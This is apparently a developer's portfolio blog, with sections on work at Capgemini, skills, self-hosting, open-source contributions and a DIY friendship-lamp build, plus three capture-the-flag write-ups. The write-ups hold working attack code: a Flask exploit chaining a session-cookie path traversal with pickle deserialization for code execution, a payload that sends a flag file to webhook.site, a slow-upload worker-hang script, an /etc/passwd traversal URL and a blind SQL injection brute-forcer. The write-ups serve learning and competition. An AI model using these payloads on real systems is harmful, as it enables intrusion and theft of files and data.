Blog Title

My Work at Capgemini

2026-04-20T00:00:00Z

In my current role, I work extensively with a legacy Java codebase that powers key internal applications, alongside newer Angular frontends. This involves maintaining and improving a complex legacy backend while enhancing security and user experience through modern Angular interfaces.

Day-to-day, I handle bug or security fixes, incremental refactoring, and new feature development. On the frontend, I contribute to Angular apps like Kaldetavle and Ankomstander, other internal products used daily by hospital staff, as well as MineAftaler - a publicly available hybrid web/native app built with Ionic Capacitor.

I’m part of a small agile scrum team (3–7 developers plus a tester), working iteratively from planning to production, in collaboration with solution architects & domain experts. I also spend significant time triaging bugs—reproducing issues from sometimes vague user-reports, providing temporary workarounds, and delivering fixes based on severity and timelines.

Alongside development, I’ve gained experience with DevOps workflows, including virtualisation, CI/CD pipelines, legacy jBoss and modern Kubernetes deployments, both on-prem and in the cloud. Capgemini has also enabled me to attend a course that cemented my foundational understanding of application security (CEH), as well as earning my OCP Java 11 certification, strengthening my Java expertise and enterprise development skills.

This role has offered a balanced mix of legacy maintenance, frontend innovation, application security and DevOps exposure—all within a collaborative, agile environment.

Skills

2026-04-19T00:00:00Z

💻 Technical Skills

🧑‍💻 Programming Languages

Java (Oracle Certified: SE 11 Developer)
TypeScript / JavaScript (Angular)
C, C++, Embedded C, C#
SQL / MySQL / OracleSQL
HTML / SCSS / PHP

🧰 Frameworks & Tools

Angular, Ionic (Cordova / Capacitor)
Unity3D
Git

☁️ DevOps & Infrastructure

Ansible (“Dive Into Ansible” – 2024)
Docker / Kubernetes
Proxmox VE, VMware vSphere
NixOS
Linux & Windows environments

🗃️ Databases

SQL, MySQL, MariaDB, OracleSQL

⚙️ Development Practices

Agile Development & Scrum
Software Design & Architecture
Full Software Development Lifecycle (SDLC)

🧠 Other Technical Skills

Digital Electronics & Logic
Microcontroller Programming
Data Analysis
Applied Mathematics

🗣 Soft Skills & Competencies

Project Management & Strategic Planning
Strong Presentation & Report Writing Skills
Fluent in English and Danish
Team Leadership & Collaboration
Customer-Facing Communication
Self-Learning & Time Management

🏢 Professional Experience

Capgemini – Lead Application & DevOps Consultant

Duration: 2019 - present (7 years, at time of writing)

Core Technologies: Angular, Java, Ansible, DevOps

Freelance Web Development

Duration: 6 months

Custom web projects using modern front-end stacks

🎓 Certifications

Oracle Certified Professional: Java SE 11 Developer (Mar 2021)
Certified Ethical Hacker Course (2022)
Ansible DevOps Training (Jul 2024)

Skill Proficiency over Time:

Skill / Proficiency	2009	2011	2013	2015	2017	2019	2021	2023	2025	2026
Mathematics	3	4	5	5	5	5	4	4	4	4
Game Development	1	2	3	3	3	2	2	2	2	2
Application Development	1	2	2	3	3	3	4	5	5	5
Web Development	1	2	2	3	3	3	4	5	5	5
Game Modding	1	1	2	3	3	3	2	2	2	2
Embedded Programming			1	3	3	2	3	2	2	2
Linux			1	2	3	3	3	4	4	5
Version Control				2	2	3	3	4	4	5
Application Security					1	2	3	4	4	5
Computer Graphics and Computer Vision					2	2	1	1	1	1
Danish						2	3	4	4	5
DevOps								2	3	4

Self-hosting, including this website

2026-04-18T00:00:00Z

This website is built using a combination of Eleventy, custom HTML, CSS, and JavaScript, and is version-controlled with Git. It's hosted on an Oracle Cloud Free Tier AMD compute instance, giving me full control over deployment and performance without incurring extra costs.

Beyond this site, I maintain a broader self-hosted ecosystem using a mix of on-premise hardware (homelab) and cloud infrastructure. My setup leverages modern infrastructure tools including:

Proxmox for virtualization
NixOS for declarative system configuration
Ansible for automation
Docker and Kubernetes for container orchestration
ZFS for reliable storage management

Hosted Services

I self-host a wide range of applications to support media, productivity, development, and system management:

📺 Media

Jellyfin, Audiobookshelf, Photoprism, Immich

🗂️ Productivity

Nextcloud, Mealie, Planka, It-tools

🌐 Network Utilities

Pi-hole, Cloudflared, Tailscale, Nginx, Caddy

📊 Monitoring & Management

Beszel, Uptime Kuma, Scrutiny, Speedtest Tracker, LibreSpeed, ChangeDetection.io, Dockpeek

🧑‍💻 Development

Gitea, Diun, Webhook, Atvloadly

🧩 Miscellaneous

Home Assistant, Kasm, Homer, Ntfy, Ownfoil, SearXNG, Kiwix, and various custom web tools

Self-hosting gives me full control, privacy, and the opportunity to experiment with real-world deployment and infrastructure challenges—skills that directly translate to software engineering, DevOps, and system administration work.

CTF Competitions (Cyber Security)

2026-04-17T00:00:00Z

Jeopardy-style Capture The Flag (CTF) competitions are cybersecurity challenges where participants solve a series of tasks across categories like reverse engineering, web exploitation, cryptography, forensics, and binary exploitation. Each challenge rewards points based on difficulty, and participants aim to score as high as possible within a limited time.

Beyond the competition itself, CTFs are excellent environments for hands-on learning. They help build and reinforce a wide range of practical skills relevant to modern software development, infrastructure, and security:

Key Skills Developed

Secure Coding & Debugging: Understanding how code is broken helps developers write safer, more resilient applications.
Scripting & Automation: Many challenges require quick custom tooling using Python, Bash, or other scripting languages.
Reverse Engineering: Dissecting binaries or obfuscated logic improves problem-solving and familiarity with low-level systems.
Web Security Knowledge: Challenges often mimic real-world vulnerabilities like SQL injection, XSS, CSRF, and IDOR, helping participants recognize and defend against them.
System & Network Forensics: Analyzing logs, memory dumps, or packet captures builds familiarity with incident investigation.
Linux & Command Line Proficiency: Most CTFs demand deep interaction with Unix-based systems and tools like gdb, strace, nmap, and tcpdump.
Container & Cloud Environments: Increasingly, CTFs include cloud-based or Dockerized challenges, improving cloud security awareness and DevOps readiness.
Critical Thinking Under Pressure: Time-constrained problem solving boosts your ability to think creatively and prioritize efficiently.

These competitions have been instrumental in sharpening my technical foundation and pushing me to explore areas beyond my daily work. Each CTF is a fast-paced, focused opportunity to build practical, cross-disciplinary skills that translate directly to real-world software and security challenges.

My CTFTime Profile

My CTF history:

KalmarCTF 2026 - 339 Points.
KalmarCTF 2025 - 209 Points.
KalmarCTF 2024 - 200 Points.
Aarhus CTF 2019 - 3106 Points (87th Percentile).
OpenToAll University (Practice CTF Challenges) 2019 - 1076 Points (87th Percentile).
Mitre (STEM) CTF 2019 - 450 Points (80th Percentile).
FireShell CTF 2019 - 360 Points (80th Percentile).

Open-Source Contributions

2026-04-16T00:00:00Z

As part of my ongoing interest in open-source development, I've contributed to a number of projects, focusing on usability improvements and practical feature additions. Below are a few highlights from my work on RuneLite, a popular client for Old School RuneScape, and Scrutiny, a web-based S.M.A.R.T monitoring tool.

RuneLite – Old School RuneScape Client

I contributed link several quality-of-life improvements and UI enhancements to RuneLite, aimed at improving player experience without altering the core gameplay:

Sidebar Enhancements: Improved the interface by making the sidebar close button auto-hide when not hovered, creating a cleaner look.
Skill Progress Bar: Added a visual progress bar to the hi-score panel, making skill tracking more intuitive at a glance.
Ground Items Visibility Toggle: Implemented a double-tap ALT hotkey function to quickly hide all ground items, with a single tap to reveal them—useful for reducing visual clutter in crowded areas.
Weak Monster Item Overlay: Developed an overlay that highlights monsters low enough in health to be finished with specific items like Ice coolers or Fungicide spray, helping players optimize item use and combat efficiency.

Scrutiny – Web UI for S.M.A.R.T Monitoring

For Scrutiny link, I focused on improving long-term usability for users managing multiple drives:

Disk Archiving Support: Added the ability to hide or archive disks within the interface, including backend handlers for archiving/unarchiving and corresponding UI updates to reflect disk status clearly

These contributions reflect my focus on thoughtful, user-oriented design in both gaming and system tools. I enjoy working with active communities and projects that value practical, high-impact improvements.

Additional Qualifications / Courses

2024-07-16T00:00:00Z

Name	Grade	Danish Eq.
Oracle Certified Professional: Java SE 11 Developer		Details
CEH – Certified Ethical Hacker Course		Details
Danish (Laerdansk Aarhus)		Details
Free Code Camp		Details
Complete C# Unity Developer 2D - Learn to Code Making Games (Udemy)		Details
Complete C# Unity Developer 3D - Learn to Code Making Games (Udemy)		Details
RPG Core Combat Creator - Unity 2017 Compatible In C# (Udemy)		Details
Game Physics - Introducing Gravitation & Rotation in Unity (Udemy)		Details
Physics (A2 - level)	A (80%)	Grade 12
Mathematics (A2 - level)	A* (90%)	Grade 12
Further Mathematics (A2 - level)	B (70%)	Grade 10
French (NVQ3)	B (70%)	Grade 10
Geography (AS - level)	C (60%)	Grade 7

Writeup: KalmarCTF 2024 - File Store (Web)

2024-03-17T00:00:00Z

KalmarCTF 2024

by Hack Sleep Deploy Repeat (KalmarCTF, CTFtime)

web

File Store (59 Solves)

Prompt

Upload your files on the Kalmar File Store and share them with your friends.

Note: For this challenge, you will not be sharing it by anybody else. Thus, you need to start your own instance.

https://filestore.chal-kalmarc.tf

<./file-store.zip>

Reconnaissance

Upon visiting the provided URL and spinning up an instance, we are presented with a web interface that allows the upload of files to a File Store web application, which is subsequently stored in a directory specific to the session ID.

Challenge Source

app.py (with our comments)

from flask import Flask, request, render_template, redirect, session
from flask_session import Session # flask_session module
import os

SESSION_TYPE = 'filesystem'       # Session data is stored in files
MAX_CONTENT_LENGTH = 1024 * 1024  # Max 1M file upload size

app = Flask(__name__)
app.config.from_object(__name__)
Session(app)

@app.route('/', methods=['GET', 'POST'])
def index():
    path = f'static/uploads/{session.sid}' # Path uses session.sid
    if request.method == 'POST':
        f = request.files['file']
        if '..' in f.filename:      # Filename cannot contain '..'
            return "bad", 400
        os.makedirs(path, exist_ok=True)
        f.save(path + '/' + f.filename)
        if not session.get('files'):
            session['files'] = []
        session['files'].append(f.filename) # session['files'] contains a list of filenames
        return redirect('/')
    return render_template('index.html', path=path, files=session.get('files', []))

if __name__ == "__main__":
    app.run(host='0.0.0.0')

Dockerfile

FROM python:3.11-slim

RUN python3 -m pip install flask flask-session gunicorn

RUN useradd ctf

COPY flag.txt /flag.txt

WORKDIR /app
COPY app.py .
COPY templates/ templates/
COPY static/style.css static/

RUN mkdir -p static/uploads flask_session
RUN chmod 777 static/uploads flask_session

USER ctf

CMD gunicorn --bind :5000 app:app

Where can we upload files?

Its appears the the intended upload path is /static/uploads/sessionid, but can we manipulate this?

The dockerfile chmod 777's both the static/uploads and flask_session directories, allowing any user to read, write and execute files in these directories, we will return to the significance of the flask_session directory later.

We have control of the filename, but it cannot contain '..' so there is no ../ directory traversal there.

What about the path variable? If we can change session.sid then we can manipulate the path.

session.sid turns out to just be the value given in the session cookie. (see "Taking a peek at flask_session source on GitHub" for confirmation)

e.g. Cookie: session=../../flask_session

path = "static/uploads/../../flask_session" which resolves to "/flask_session"

Our unintended solution for the local instance (16/03/24)

Package namespace poisoning

We have a module being imported called flask_session and a directory (we have permission to write to) called flask_session, this allows the opportunity for package namespace poisoning, however this module is only imported at the start of the python script, so we would need to upload a file and then reboot the worker somehow?

According to https://docs.gunicorn.org/en/stable/settings.html the worker has a default timeout of 30 seconds, if it hangs for 30 seconds the worker will be restarted, so if we can hang the web app for 30 seconds we should be able to execute our code when flask_session is imported on the worker restart.

timeout

Default: 30

Workers silent for more than this many seconds are killed and restarted.

What is package namespace poisoning

Package namespace poisoning is a technique where an attacker manipulates the namespace of a package or module. By injecting malicious content into the package or module's namespace, attackers can execute arbitrary code.

In the context of this challenge, package namespace poisoning involves manipulating the flask_session module to execute arbitrary code on the server by placing an ___init__.py file in the ./flask_session directory, which is then executed on import, this is the case as python first looks in the current directory when resolving package namespaces.

The Payload

# ./flask_session/__init__.py

# from flask_session import *

# Write flag file to a path we can access on the site incase request fails
import os
os.system("cat /flag.txt > /app/static/uploads/flag.txt")

# Send flag file as a GET request to webhook if worker never recovers
import http.client
host = "webhook.site"
conn = http.client.HTTPSConnection(host)

with open("/flag.txt") as f:
    flag = str(f.read())[:-1]
    conn.request("GET", "/6aa6e780-08a6-4d73-8c89-0a5f371faa43/?flag="+flag)
    response = conn.getresponse()
    print(response.status, response.reason)

#Self destructs after execution to aid worker recovery
os.system("rm /app/flask_session/__init__.py")

We can hang the gunicorn worker with a slow upload, but we cannot upload files larger than 1M (set by MAX_CONTENT_LENGTH) so a very large file isn't an option, but we can upload via curl at whatever speed we want, so that gunicorn restarts the worker after spending 30 seconds handling our request.

solve-unintended.sh

#!/bin/bash

# run with ./solve-unintended.sh http://localhost:5000
#__init__.py payload should also be located in current directory
url=$1
echo $url

# Upload payload to /flask_session/__init__.py
curl -X POST $url \
     -H "Cookie: session=../../flask_session" \
     -F "file=@__init__.py;filename=__init__.py" \

# Generate a 1M file
truncate -s 1M nullbytes

# Upload 1M nullbytes file very slowly
curl -X POST $url \
     --limit-rate 1B \
-H 'Content-Type: multipart/form-data; boundary=---------------------------83051994911902789612622995941' \
 --data-binary $'-----------------------------83051994911902789612622995941\r\nContent-Disposition: form-data; name="file"; filename="nullbytes"\r\nContent-Type: application/octet-stream\r\n\r\n-----------------------------83051994911902789612622995941--\r\n' -v

echo "If it worked app should have crashed by now"

# Get the flag after payload execution
curl "$url/static/uploads/flag.txt"

This works locally but fails on the remote instance. 😱

We made a ticket in the CTF discord (late into the night)

HestenettetDK — 17/03/2024 03:01

Best help I can give is that the challenge has solves, so :TryHarder:

Myldero — 17/03/2024 03:18

It should be noted that on remote, to get the individual instances to work, the challenge is put behind nginx. This may affect this solution. If you want a setup as similar as remote, you might need to put an nginx server in front

Theory: The NGINX instance buffers our slow curl upload of the nullbytes file before proxying it to the application, so the worker never hangs. 😥

Sticking at the unintended solution (17/03/24)

After sleeping on the issue we woke up with the thoughts, what if we mess with the session file or upload a ton of files so that a GET request would timeout just parsing filenames from session['files']?

We can't be bothered to upload so many files and the challenge instance only lives for 10 mins, but can we manipulate the value stored in session["files"], let try locally.

Taking a peek at flask_session source on GitHub:

TLDR; flask_session source: It calls pickle.load on the session file (except the first 4 bytes as this is a timestamp), and the session file name is just an md5 of 'session:{session.sid}' so we have a predictable filename. 🍾

Extracts from flask-session & cachelib source

# https://github.com/pallets-eco/flask-session/blob/main/src/flask_session/base.py#L332
 def open_session(self, app: Flask, request: Request) -> ServerSideSession:
        # Get the session ID from the cookie
        # SESSION_COOKIE_NAME = "session" by default
        sid = request.cookies.get(app.config["SESSION_COOKIE_NAME"])
		# ...
		# Retrieve the session data from the database
            # Returns Defaults.SESSION_KEY_PREFIX("session:") + sid
        store_id = self._get_store_id(sid)
        saved_session_data = self._retrieve_session_data(store_id)


# https://github.com/pallets-eco/flask-session/blob/main/src/flask_session/filesystem/filesystem.py#L89
from cachelib.file import FileSystemCache
	# ...
 self.cache = FileSystemCache(
            cache_dir=cache_dir, threshold=threshold, mode=mode
        )
		# ...
def _retrieve_session_data(self, store_id: str) -> Optional[dict]:
        # Get the saved session (item) from the database
        return self.cache.get(store_id)




# https://github.com/pallets-eco/cachelib/blob/main/src/cachelib/file.py#L203
def _get_filename(self, key: str) -> str:
        if isinstance(key, str):
            bkey = key.encode("utf-8")  # XXX unicode review
            bkey_hash = self._hash_method(bkey).hexdigest()
              # hash_method is md5 by default
        # ...
        return os.path.join(self._path, bkey_hash)
            # /flask_session/{md5hash of "session:sid"}

def get(self, key: str) -> _t.Any:
        filename = self._get_filename(key)
            # /flask_session/{md5hash of "session:sid"}
        try:
            # Opens session file
            with self._safe_stream_open(filename, "rb") as f:
                # Reads the first 4 bytes as a timestamp
                pickle_time = struct.unpack("I", f.read(4))[0]
                if pickle_time == 0 or pickle_time >= time():
                    return self.serializer.load(f)
                    # serializer = cachelib.serializers.FileSystemSerializer()


# https://github.com/pallets-eco/cachelib/blob/main/src/cachelib/serializers.py#L19C5-L34C24

def dump(
        self, value: int, f: _t.IO, protocol: int = pickle.HIGHEST_PROTOCOL
    ) -> None:
        try:
            pickle.dump(value, f, protocol)
			# FileSystemSerializer.dump() is just a pickle.dump (!)

    def load(self, f: _t.BinaryIO) -> _t.Any:
        try:
            data = pickle.load(f)
            # FileSystemSerializer.load() is just a pickle.load (!)

A bit too much time wasting

We then spend far too long modifying session["files"] before realizing modifying session["files"] to a long enough list results in a session file size (90-190M) over the file upload limit anyway... 🤷

We could continue with the "Too many file upload 'manually'", but didn't go with this approach as we thought it could take longer than the 10 minute lifetime that the instance has.

Let's try it now for fun 😛

You rolled 20 🎲 on your sanity check - After CTF ended

So it turns out running this upload script of an empty file 100000+ times take well over the 10 minute mark and 100000 entries is still not enough to hang the app.

I believe the success we saw when modifying the session["files"] directly required around 1000000 entries.

./upload_script.sh 'http://localhost:5000/' 'your_session_cookie' 100000

#!/bin/bash

# Function to upload an empty file using curl with the provided format
upload_empty_file() {
    curl "$1" -X POST -H 'Content-Type: multipart/form-data; boundary=---------------------------93988107812353882894080128531' -H "Cookie: session=$2" --data-binary $'-----------------------------93988107812353882894080128531\r\nContent-Disposition: form-data; name="file"; filename="some_file"\r\nContent-Type: application/octet-stream\r\n\r\n-----------------------------93988107812353882894080128531--\r\n'
}

# Check for the correct number of arguments
if [ $# -ne 3 ]; then
    echo "Usage: $0 <URL> <Session Cookie> <Number of times>"
    exit 1
fi

# Extract arguments
url=$1
session_cookie=$2
num_times=$3

# Loop to upload the empty file 'num_times' times
for ((i=1; i<=$num_times; i++)); do
    echo "Uploading empty file attempt $i..."
    upload_empty_file "$url" "$session_cookie"
done

echo "Uploads complete."

Finally the intended solution (Which got us the actual flag)

Wait we just spend x hours playing with the pickled session file... Aren't pickles dangerous? 🤔

Pickling is a process of serializing Python objects into a byte stream, often used for data storage or transmission. However, unpickling untrusted data can lead to code execution vulnerabilities, commonly known as pickle deserialization attacks.

See more: https://blog.nelhage.com/2011/03/exploiting-pickle/

# tainted_pickle.py
import struct
import pickle
import random

filename = "md5 of session id"

class RCE:
        def __reduce__(self):
            import os
            cmd = ('cat /flag.txt > /app/static/uploads/flag.txt')
            return os.system, (cmd,)

with open(filename, "wb") as f:
            rce = RCE()
            f.seek(4) # Leave the first 4 bytes unmodified
            session_value = rce
            pickle.dump(session_value, f)

Uploading this bad boy to /flask_session/md5_of_session_id presents us the flag at {instance_url}/app/static/uploads/flag.txt 🎊

Solution as a single script?

The File Store challenge underscores the importance of thorough understanding of various web application vulnerabilities. By exploring different avenues (reading 3rd party sources) and exploiting vulnerabilities such as package namespace poisoning and pickle deserialization, we cracked this insecure flask web application wide open.

solve.py

import requests
import hashlib
import pickle

def upload_file(url, filename, content, session_cookie=None):
    cookies = None
    if session_cookie:
        cookies = {'session': session_cookie}
    files = {'file': (filename, content)}
    response = requests.post(url, files=files, cookies=cookies)
    return response


def generate_payload():
    class RCE:
        def __reduce__(self):
            import os
            cmd = ('cat /flag.txt > /app/static/uploads/flag.txt')
            return os.system, (cmd,)

    rce = RCE()
    payload = b"\x00\x00\x00\x00" + pickle.dumps(rce)
    return payload

def submit_payload(url, session_id):
    filename = hashlib.md5(("session:" + session_id).encode()).hexdigest()
    payload = generate_payload()
    response = upload_file(url, filename, payload, '../../flask_session/')
    return response

def execute_payload(url, session_id):
    response = requests.get(url + "/", cookies={'session': session_id})
    return response.status_code

def get_flag(url, session_id):
    response = requests.get(url + "/static/uploads/flag.txt")
    return response.text

if __name__ == "__main__":
    url = input("Enter the instance URL: ")
    if url == "":
         url = "http://localhost:5000"
    first_upload = upload_file(url,'empty_file', b'')
    session_id = first_upload.cookies.get('session')
    print("First upload:", first_upload.status_code)
    print("Session ID:", session_id)
    payload_upload = submit_payload(url, session_id)
    print("Payload upload:", payload_upload.status_code)
    print("Payload execute:", execute_payload(url, session_id))
    flag = get_flag(url, session_id)
    print("Flag:", flag)

Friendship Lamp Clone

2021-03-16T00:00:00Z

Why Buy 3 When You Can Make 3?

Recreating LuvLink's Friendship Lamp with ESP8266, NeoPixels, and a Lot of Coffee

Let me take you back to early 2021, where the world could do with more social interactions across long distances. I wanted to give my family (who live in another country) something meaningful, something connected — and also scratch that maker itch with a personal challenge. Inspired by LuvLink’s Friendship Lamps (cute Wi-Fi-connected RGB led lights that glow in sync across distances), I asked myself:

Why buy three for $$$ when I could make three for <$ and learn a ton in the process?

Spoiler: I did it. And it worked. And yes, I refreshed my electronics knowledge, learned a bunch about ESP devices, MQTT, OTA updates, and more along the way. Here's the story.

The Mission

LuvLink’s Friendship Lamps let you touch your lamp, and—poof!—a paired lamp across the world glows with the same color. Sweet idea, but expensive when you want more than two. So I set out to:

Clone the core functionality
Make three of them for less than half the price of one retail set
Use the project to revisit microcontrollers, circuit design, and embedded programming
Finish it in time for Mother's Day

The Hardware

The brains of the operation? A humble D1 Mini (ESP8266). I could have picked something beefier, but these little guys are small, cheap, reliable, and packed with features for Wi-Fi-connected projects.

I gutted a set of Chinese ambient RGB lamps (just decorative touch lights that look suspiciously like the real deal), stripped out the original LEDs, and replaced them with NeoPixel rings—those delightful addressable RGB LEDs from Adafruit that can do buttery-smooth color fades, custom animations, and more.

Touch Input?

Here’s where I went a little old-school. I rigged up a simple RC circuit connected to one of the D1 Mini’s digital inputs to simulate a touch sensor. It worked well enough, but in hindsight... I could’ve saved time and effort by using a microcontroller with capacitive touch input baked in (like the ESP32). Lesson learned!

The Software Stack

Recreating the core functionality wasn't just about lights and taps—it was about making the experience feel polished and connected. I did my best to mimic the real product’s behavior based on what I could find online.

Here’s what went into the firmware:

🛰️ MQTT for Realtime Communication

Each lamp connected to a shared MQTT broker (Adafruit IO). When one lamp was touched, it published a message with the configured color. The others would instantly pick it up and glow accordingly. The latency was so low, it felt like magic.

📶 WiFi Setup Mode

I implemented a dedicated setup mode (triggered via long press or first boot) that spun up an access point and served a captive portal using WiFiManager and themed to look like a genuine product. Family members could easily onboard their lamps to their home Wi-Fi—no fuss, no USB cable, no technical knowledge.

🔄 OTA Firmware Updates

Once the lamps were gifted and out in the wild, I still wanted to be able to iterate, such as adding fun animations for special days, like christmas and birthdays. So I baked in secure Over-The-Air updates, allowing me to push firmware tweaks or bug fixes without needing physical access. Huge win.

🌈 Status Modes & Boot Feedback

I wanted the lamps to feel alive, so I added a bunch of UX flourishes:

Startup color swirl while the lamp connected to Wi-Fi
Special animation modes for setup/reset/OTA update
A subtle blink for "connected" confirmation

These weren’t essential, but they made the whole experience smoother and more intuitive—especially for non-technical users. And theses light patterns and their meanings were already well documented by our friends over at LuvLink.

Lessons Learned

Microcontrollers are ridiculously powerful these days. The D1 Mini (ESP8266) handled Wi-Fi, OTA, touch input, and RGB control without breaking a sweat.
MQTT is the hero of IoT projects. Lightweight, real-time, and easy to manage.
Next time, use a chip with native touch input. My RC circuit worked, but ESP32s are just as cheap, save you the analog gymnastics and aren't as prone to noise.
Recreating commercial UX is hard but rewarding. Things like status lights, update feedback, and onboarding flow aren’t just bells and whistles—they're what turn a hack into a product.

The Payoff

By Mother’s Day 2021, all three lamps were in place—in three different homes, across two countries. And every time someone taps their lamp, the others glow the same color. No text. No call. Just a quiet "I’m thinking of you."

What started as a budget hack turned into one of my most rewarding personal projects to date. It reminded me why I love working with embedded systems and hardware. And my families reaction? Totally worth the solder fumes and frantic last-minute debugging and touch sensor tuning.

Hot tip: Never (again) roll your own touch sensor.

Would I do it again? Absolutely. But maybe next time with a less looming deadline, an ESP32, a better enclosure (now that I have a 3D printer), and some more reactive animations just for fun.

Writeup: Aarhus CTF 2019 - Navitas (Web)

2019-05-13T00:00:00Z

Challenge: Navitas (Aarhus CTF 2019)

By Team "! leftovers" (Sam Beresford & Emilie Bjerg)

Challenge description:

In this challenge we had to find the username of the linux system user.

Solution:

The page does not contain any input fields, and the cookies does not seem give anything away, however, there is a page-query in the url. A directory traversal attack might therefore be possible using this. Changing home.php to ../../../../../etc/passwd makes us able to view the passwd file on the webservers linux system:

In this the flag is found: CTF{I_sh0Uld_n07_t4k3_P4thS_fR0M_t3H_U53R}

Full url (http://165.22.90.215:8094/?page=../../../../../etc/passwd)

Challenge solved!

Writeup: Aarhus CTF 2019 - LeakDB (Web)

2019-05-13T00:00:00Z

Aarhus CTF 2019 - LeakDB

(Web, 484 Points, 5 Solves)

By Team "! leftovers" (Sam Beresford & Emilie Bjerg)

Challenge Description:

We are being asked to find a flag located somewhere on the provided website. A hint, about the necessity of brute-forcing being required to solve this challenge is given, suggesting that some form of blind SQL injection may be required.

Solution

The website allows a user to enter a password and then checks if this has been leaked by looking it up in its database. The website can give three different responses depending on the input it is given.

The "failed" response occurs when the query is invalidated. The "Congratulations" response occurs when the query returns False. Whereas the "Oh no..." response occurs when the query returns True.

The "The SQLite query failed" response, reveals the database management system to be SQLite. Whilst the other two responses enable us to perform a boolean-based blind SQL injection.

With this information we can write a script to brute-force the table names of the database, as we are able to detect whether or not our statements return true.

Our table name brute-force returns "LEAKED_PASSWORDS" and "SECRETS".

Having found the table names we can try to brute-force the first entry in the table "SECRETS", this returns the flag.

Flag:

CTF{OH_DID_YOU_JUST_DUMP_ME?}

Code used

import requests
import re

url = "http://165.22.90.215:8085"

# Bruteforcing of passwords in table"
# basePayload = "' OR password like '"

# Bruteforcing SQLite database table names
# basePayload = "' UNION SELECT name FROM sqlite_master WHERE type='table' AND name LIKE '"
# Results:
# LEAKED_PASSWORDS
# SECRETS


# Bruteforce entry in SECRET table
basePayload = "' OR (SELECT * from SECRETS) LIKE '"

known = ""
i = 32 #Try ascii chars from 32(Space) to 125(})
while i < 126:
  # print known + chr(i)
  if i == 37: # Escape '%' character
    payload = basePayload + known + "\\" + chr(i) + "%'-- ";
  else:
    payload = basePayload + known + chr(i) + "%'-- ";
  # print payload

  response = requests.post(url, data = {"pass" : payload})
  content = response.text

  if len(re.findall('Oh no', content)) > 0: # Check if oh no... exists (Query = True)
    known += chr(i)
    print known
    i = 32 # Reset for next character
  i+=1
print known